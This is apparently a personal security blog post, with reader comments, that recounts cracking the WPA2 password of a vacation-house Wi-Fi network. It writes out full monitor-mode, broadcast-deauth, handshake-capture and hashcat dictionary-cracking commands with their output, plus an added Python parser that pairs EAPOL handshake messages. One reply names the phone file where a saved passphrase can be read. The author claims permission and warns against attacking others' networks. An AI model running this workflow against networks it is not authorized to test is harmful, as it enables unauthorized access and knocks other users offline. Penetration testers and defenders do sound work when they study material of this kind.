Hashcat WPA2 Cracking – Beach Edition

As a perfect follow-up to our Wireless CTF win, I present some hashcat WPA2 cracking.

The Challenge

I headed to the beach right after DEF CON, to spend some time with Hacker’s Girlfriend and her family.

My first day there, the girlfriend told me, “If you don’t come to the beach with me, then I won’t give you the Wi-Fi password.” Unfortunately, there were two problems with this scenario. The first was that I had plenty of books, beer, and 4G signal to keep myself busy for a few days. The second, and most important, as I explained to her, was that I had just come back from winning a wireless hacking competition at DEF CON.

I still went down to the beach with her, but I decided to prove my point a bit later.

Finding the Network

Shortly after dinner, she went off shopping, so I got to work.

First, I made sure that I connected and properly configured my wireless card.

root@kali32:~# iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Then, I needed to find the network. This was easy enough with airodump-ng, as it was the AP with the strongest signal (highest PWR).

root@kali32:~# airodump-ng wlan0
 CH 10 ][ Elapsed: 18 s ][ 2017-08-01 21:15                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:25:xx:xx:xx:xx   -1        0        0    0  -1  -1                           
 00:23:xx:xx:xx:xx  -48       27      254    0  11  54e  WPA2 CCMP   PSK  beachbreeze       
 00:1D:xx:xx:xx:xx  -64       31        3    0  11  54e  WPA2 CCMP   PSK  xxxxxxxx       

Capturing the Traffic

Next, I needed to capture and log the traffic to this AP.

The first thing I did was place my interface into monitor mode.

root@kali32:~# airmon-ng start wlan0 11

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  328 NetworkManager
  767 wpa_supplicant

PHY    Interface    Driver        Chipset

phy0    wlan0        ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

        (mac80211 monitor mode already enabled for [phy0]wlan0 on [phy0]11)

Then, I pointed airodump-ng at the target BSSID on channel 11 and began writing the capture to files prefixed wpa-breeze.

root@kali32:~# airodump-ng --bssid 00:23:xx:xx:xx:xx -c 11 --write wpa-breeze wlan0

Deauth ALL THE THINGS!

I figured it would be simple enough to capture a handshake, since the kids (and adults) needed their Wi-Fi.

In this case, since I wasn’t worried about a short outage, I decided to just send 25 broadcast deauths to speed things along.

root@kali32:~# aireplay-ng --deauth 25 -a 00:23:xx:xx:xx:xx wlan0
21:23:24  Waiting for beacon frame (BSSID: 00:23:xx:xx:xx:xx) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:23:24  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]
21:23:25  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]
21:23:25  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]

As a result, I was able to quickly capture a new WPA handshake.

 CH 11 ][ Elapsed: 4 mins ][ 2017-08-01 21:27 ][ WPA handshake: 00:23:xx:xx:xx:xx       

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:23:xx:xx:xx:xx  -44  92     2506    72556   76  11  54e  WPA2 CCMP   PSK  beachbreeze 

File Conversion

For those of you unfamiliar, hashcat WPA2 cracking (mode 2500, the current mode at the time) reads handshakes from .hccapx files rather than from raw .cap captures.

In this case, I needed to convert my .cap to a .hccapx so that I could crack it using hashcat. Note that newer hashcat releases replace mode 2500 and .hccapx with mode 22000 and the hc22000 format produced by hcxpcapngtool; the workflow below is otherwise the same.

First, I downloaded the hashcat-utils.

Rays-MacBook-Pro:tools doyler$ git clone https://github.com/hashcat/hashcat-utils
Cloning into 'hashcat-utils'...
remote: Counting objects: 391, done.
remote: Total 391 (delta 0), reused 0 (delta 0), pack-reused 391
Receiving objects: 100% (391/391), 110.78 KiB | 106.00 KiB/s, done.
Resolving deltas: 100% (250/250), done.

Next, I built all the utils in the src directory.

Rays-MacBook-Pro:src doyler$ pwd
/Users/doyler/tools/hashcat-utils/src
Rays-MacBook-Pro:src doyler$ make
rm -f ../bin/*
rm -f *.bin *.exe
cc -Wall -W -pipe -O2 -std=gnu99  -o cap2hccapx.bin cap2hccapx.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cleanup-rules.bin cleanup-rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combinator.bin combinator.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combinator3.bin combinator3.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combipow.bin combipow.c
cc -Wall -W -pipe -O2 -std=gnu99  -o ct3_to_ntlm.bin ct3_to_ntlm.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cutb.bin cutb.c
cc -Wall -W -pipe -O2 -std=gnu99  -o expander.bin expander.c
cc -Wall -W -pipe -O2 -std=gnu99  -o gate.bin gate.c
cc -Wall -W -pipe -O2 -std=gnu99  -o generate-rules.bin generate-rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o hcstatgen.bin hcstatgen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o hcstat2gen.bin hcstat2gen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o keyspace.bin keyspace.c
cc -Wall -W -pipe -O2 -std=gnu99  -o len.bin len.c
cc -Wall -W -pipe -O2 -std=gnu99  -o mli2.bin mli2.c
cc -Wall -W -pipe -O2 -std=gnu99  -o morph.bin morph.c
cc -Wall -W -pipe -O2 -std=gnu99  -o permute.bin permute.c
cc -Wall -W -pipe -O2 -std=gnu99  -o permute_exist.bin permute_exist.c
cc -Wall -W -pipe -O2 -std=gnu99  -o prepare.bin prepare.c
cc -Wall -W -pipe -O2 -std=gnu99  -o req-include.bin req-include.c
cc -Wall -W -pipe -O2 -std=gnu99  -o req-exclude.bin req-exclude.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rli.bin rli.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rli2.bin rli2.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rules_optimize.bin rules_optimize.c cpu_rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o splitlen.bin splitlen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsr.bin strip-bsr.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsn.bin strip-bsn.c

Finally, I used cap2hccapx to convert the .cap file to a .hccapx file.

Rays-MacBook-Pro:src doyler$ ./cap2hccapx.bin ~/Documents/_CTFs_/wpa/wpa-breeze-01.cap ~/Documents/_CTFs_/wpa/breeze.hccapx
Networks detected: 1

[*] BSSID=00:23:xx:xx:xx:xx ESSID=beachbreeze (Length: 11)
 --> STA=4c:66:xx:xx:xx:xx, Message Pair=0, Replay Counter=0
 --> STA=4c:66:xx:xx:xx:xx, Message Pair=2, Replay Counter=0
 --> STA=c0:18:xx:xx:xx:xx, Message Pair=2, Replay Counter=0

Written 3 WPA Handshakes to: /Users/doyler/Documents/_CTFs_/wpa/breeze.hccapx
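The capture and conversion steps above only pay off if the .cap actually contains a complete pair of handshake messages for the target BSSID, which is what cap2hccapx is reporting with its "Message Pair" lines. The following is an added example, not code from the original post or from hashcat-utils: it parses raw 802.11 data frames for EAPOL-Key messages, classifies each as M1 to M4 from the Key Information flags, and pairs them by replay counter the way the .hccapx message_pair numbering does. The frames it scans are constructed inline (no radiotap header), and the MAC addresses, nonces and zeroed MICs are placeholders, not values from the beachbreeze capture.

```python
# Added example, not code from the original post: find usable 4-way handshake
# message pairs in raw 802.11 data frames (the check cap2hccapx performs).
import struct

INSTALL, ACK, MIC, SECURE = 0x0040, 0x0080, 0x0100, 0x0200  # EAPOL-Key Key Information bits
PAIRWISE, VERSION_AES = 0x0008, 0x0002
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")          # LLC/SNAP header + EtherType 0x888e


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_eapol_key(frame):
    """Return {bssid, sta, msg, replay, nonce, mic} for an EAPOL-Key data frame, else None."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    to_ds, from_ds = (fc >> 8) & 1, (fc >> 8) & 2
    if (fc >> 2) & 3 != 2 or (to_ds and from_ds):   # only 3-address data frames
        return None
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    bssid, sta = (a1, a2) if to_ds else (a2, a1) if from_ds else (a3, a2)
    body = frame[26 if (fc >> 4) & 8 else 24:]      # QoS-Data adds a 2-byte QoS field
    if not body.startswith(LLC_SNAP_EAPOL):
        return None
    eapol = body[8:]
    if len(eapol) < 99 or eapol[1] != 3:            # EAPOL type 3 = Key; 4-byte hdr + 95-byte body
        return None
    key_info = struct.unpack_from("!H", eapol, 5)[0]
    replay = struct.unpack_from("!Q", eapol, 9)[0]
    nonce, mic = eapol[17:49], eapol[81:97]
    ack, has_mic = key_info & ACK, key_info & MIC
    if ack and not has_mic:
        msg = 1
    elif ack and key_info & INSTALL:
        msg = 3
    elif has_mic and not ack:
        # WPA2 sets Secure on M4; pre-RSN WPA does not, so an all-zero nonce is
        # used as a fallback M4 indicator (heuristic, not from the standard).
        msg = 4 if (key_info & SECURE or nonce == bytes(32)) else 2
    else:
        return None
    return {"bssid": bssid, "sta": sta, "msg": msg, "replay": replay, "nonce": nonce, "mic": mic}


def find_handshakes(frames, bssid):
    """Return sorted (sta, message_pair) tuples, numbered as in the hccapx format:
    0 = M1+M2, 1 = M1+M4, 2 = M2+M3, 4 = M3+M4. Each pair needs an AP message
    (ANonce) and a client message (SNonce + MIC) from the same exchange, which the
    replay counter ties together (M1/M2 equal, M3 = M2 + 1, M4 = M1 + 1, M3/M4 equal)."""
    per_sta = {}
    for f in frames:
        p = parse_eapol_key(f)
        if p and p["bssid"] == bssid:
            per_sta.setdefault(p["sta"], []).append(p)
    found = set()
    for sta, msgs in per_sta.items():
        for a in (m for m in msgs if m["msg"] in (1, 3)):
            for s in (m for m in msgs if m["msg"] in (2, 4)):
                key = (a["msg"], s["msg"])
                if key == (1, 2) and s["replay"] == a["replay"]:
                    found.add((mac_str(sta), 0))
                elif key == (1, 4) and s["replay"] == a["replay"] + 1:
                    found.add((mac_str(sta), 1))
                elif key == (3, 2) and a["replay"] == s["replay"] + 1:
                    found.add((mac_str(sta), 2))
                elif key == (3, 4) and s["replay"] == a["replay"]:
                    found.add((mac_str(sta), 4))
    return sorted(found)


def build_eapol_key(sta, bssid, from_ap, key_info, replay, nonce):
    """Construct a minimal 802.11 data frame carrying one EAPOL-Key message (test data)."""
    hdr = struct.pack("<H", 0x0008 | ((2 if from_ap else 1) << 8)) + b"\x00\x00"  # FromDS / ToDS
    hdr += (sta + bssid + bssid) if from_ap else (bssid + sta + bssid)            # addr1..addr3
    body = (struct.pack("!BHH", 2, key_info, 16) + struct.pack("!Q", replay) + nonce
            + bytes(32) + bytes(16) + b"\x00\x00")   # IV/RSC/ID, zero MIC, key data length 0
    return hdr + b"\x00\x00" + LLC_SNAP_EAPOL + struct.pack("!BBH", 2, 3, len(body)) + body


# Constructed sample capture: placeholder MACs and nonces, zeroed MICs.
AP = bytes.fromhex("002300000001")
STA_A, STA_B, STA_C = bytes.fromhex("4c6600000001"), bytes.fromhex("c01800000002"), bytes.fromhex("dead00000003")
ANONCE, SNONCE = b"\xaa" * 32, b"\xbb" * 32
M1, M2 = ACK | PAIRWISE | VERSION_AES, MIC | PAIRWISE | VERSION_AES
M3, M4 = M1 | MIC | INSTALL | SECURE, M2 | SECURE
SAMPLE_FRAMES = [
    bytes.fromhex("80000000") + b"\xff" * 6 + AP + AP + b"\x00\x00",  # beacon: not a data frame
    build_eapol_key(STA_A, AP, True, M1, 1, ANONCE),    # client A: complete M1..M4
    build_eapol_key(STA_A, AP, False, M2, 1, SNONCE),
    build_eapol_key(STA_A, AP, True, M3, 2, ANONCE),
    build_eapol_key(STA_A, AP, False, M4, 2, bytes(32)),
    build_eapol_key(STA_B, AP, False, M2, 5, SNONCE),   # client B: M1 missed, M2+M3 still usable
    build_eapol_key(STA_B, AP, True, M3, 6, ANONCE),
    build_eapol_key(STA_C, AP, True, M1, 9, ANONCE),    # client C: M1 only, never answered
]

if __name__ == "__main__":
    for sta, pair in find_handshakes(SAMPLE_FRAMES, AP):
        print(f" --> STA={sta}, Message Pair={pair}")
```

Client C shows the case a deauth run can leave you with: the AP sends M1 after the client reassociates, but if the client's M2 is lost (or the client never comes back), there is no SNonce and no MIC, and the capture is not crackable no matter what airodump-ng's status line says. Client B shows the opposite: missing M1 is fine as long as M2 and M3 are both there, which is the "Message Pair=2" entry in the cap2hccapx output above.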

Hashcat WPA2 Cracking

With the .hccapx file in hand, cracking it with hashcat was a breeze.

I used the following flags and options to perform the cracking.

  • -m 2500 = WPA/WPA2 hash mode
  • -r ~/tools/cracking/best64.rule = apply the best64 rule set to mangle each dictionary word
  • -d 2,3 = use only OpenCL devices 2 and 3 (the two GPUs), skipping the CPU
  • breeze.hccapx = the .hccapx file to crack
  • ~/tools/cracking/rockyou.txt = the rockyou dictionary
Rays-MacBook-Pro:wpa doyler$ hashcat -m 2500 -r ~/tools/cracking/best64.rule -d 2,3 breeze.hccapx ~/tools/cracking/rockyou.txt
hashcat () starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 3 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD

Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104433792

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: breeze.hccapx
Time.Started.....: Wed Aug  2 19:51:57 2017 (4 secs)
Time.Estimated...: Thu Aug  3 00:47:28 2017 (4 hours, 55 mins)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     2713 H/s (7.96ms)
Speed.Dev.#3.....:    58856 H/s (8.08ms)
Speed.Dev.#*.....:    61549 H/s
Recovered........: 0/2 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 12866667/1104433792 (1.17%)
Rejected.........: 12686443/12866667 (98.60%)
Restore.Point....: 0/14343296 (0.00%)
Candidates.#2....: 123456789 -> 09876543210
Candidates.#3....: 20032003 -> ARCTICCAT

42xxxxxxxxxxxxxxxxxxxxxxxxxxxxd7:00xxxxxxxxe3:c0xxxxxxxx03:beachbreeze:RXXXXXXE
b0xxxxxxxxxxxxxxxxxxxxxxxxxxxx32:00xxxxxxxxe3:4cxxxxxxxxd8:beachbreeze:RXXXXXXE

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: breeze.hccapx
Time.Started.....: Wed Aug  2 19:51:57 2017 (5 secs)
Time.Estimated...: Wed Aug  2 19:52:02 2017 (0 secs)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     5192 H/s (8.00ms)
Speed.Dev.#3.....:    58907 H/s (8.08ms)
Speed.Dev.#*.....:    64099 H/s
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 12981355/1104433792 (1.18%)
Rejected.........: 12686443/12981355 (97.73%)
Restore.Point....: 0/14343296 (0.00%)
Candidates.#2....: 123456789 -> 09876543210
Candidates.#3....: 20032003 -> ARCTICCAT

Started: Wed Aug  2 19:51:52 2017
Stopped: Wed Aug  2 19:52:03 2017

Once everything was set up, hashcat needed only 11 seconds of wall-clock time to crack the password. Note the high Rejected count in the status output: WPA2 passphrases must be 8 to 63 characters long, so hashcat drops every candidate outside that range before doing any PBKDF2 work, and most of the rejected 98.60% are rockyou entries (and best64 mutations of them) shorter than 8 characters.

Hashcat WPA2 Cracking – Conclusion

While this was a simpler network to get into, it was still a fun challenge, and a good way to show a problem we faced during the wireless CTF. Note that this was a network I had legitimate access to, since we were staying there. I do not recommend attacking networks that you do not own or control without permission.

In the end, the password worked, and I was able to connect to the network!

[Screenshot: Hashcat WPA2 Cracking - Connected]

4 Comments

  1. I was running into some issues with hashcat on rules. That’s where I found your blog regarding using rules. I was wondering if you might be able to give me some pointers. I have an extra router I bought a while back. I told my wife to set a password on it and not tell me. It had to be 8 characters min. I had my Android phone connect to it after my wife entered the password. I was able to get a handshake. The issue I’m having now is that I have been using rockyou and other password wordlists I downloaded from the web.

    My question now is: if rockyou and the downloaded wordlists didn’t find the word, would best64.rule work for it?

    Is there some kind of rule just for the WPA2 file I could use? I really don’t want to keep downloading wordlists from the net since they could be big and have a lot of junk symbols in the file. Let me know what you think.

    Thanks,

    • Sure, glad to try and help!

      First of all, if you’ve rooted your phone, you can just find the passphrase in the /data/misc/wifi/wpa_supplicant.conf file.

      That said, if not, you can find the best64 rule from here – https://github.com/hashcat/hashcat/tree/master/rules

      Note that rules are just modifications to words in your wordlist (capitalize first letter, leet-speak replacements, etc.). If the original word (or close to it) is not in your original wordlist, then you will not crack the hash.

      I normally just run best64 + rockyou on my personal machine before sending it off to our more powerful cracking rig. That said, I’m hoping to finish my password cracker soon and have even more techniques/power!

      • Thank you for taking the time to reply. I think the word might not be in the list. I did ask for a hint on the password. That didn’t help at all. I did try best64 on my machine. It took a few minutes to go over the file. I guess I have to continue trying with other wordlists.

        When you move it to your other rig, are you using the same wordlist or a different one? What spec, if you don’t mind me asking, is the rig?

        Mine, I have a 1070 Ti and a 1050 Ti card running. I really wish I could get at least one 1080 Ti to add to my machine.

        thanks again for your help.

        • Ah, too bad. Yeah, WPA is hard to crack, and if it isn’t in your dictionary you’re probably out of luck.

          I’ll normally be using the same wordlist, but I will probably start to branch out more and perform some testing/analysis.

          The rig will have one GTX 1080 (non-Ti for now, unfortunately). I’d love to add a second card (the Ti) once I get more money, but the goal was a cracking rig for <$1500.
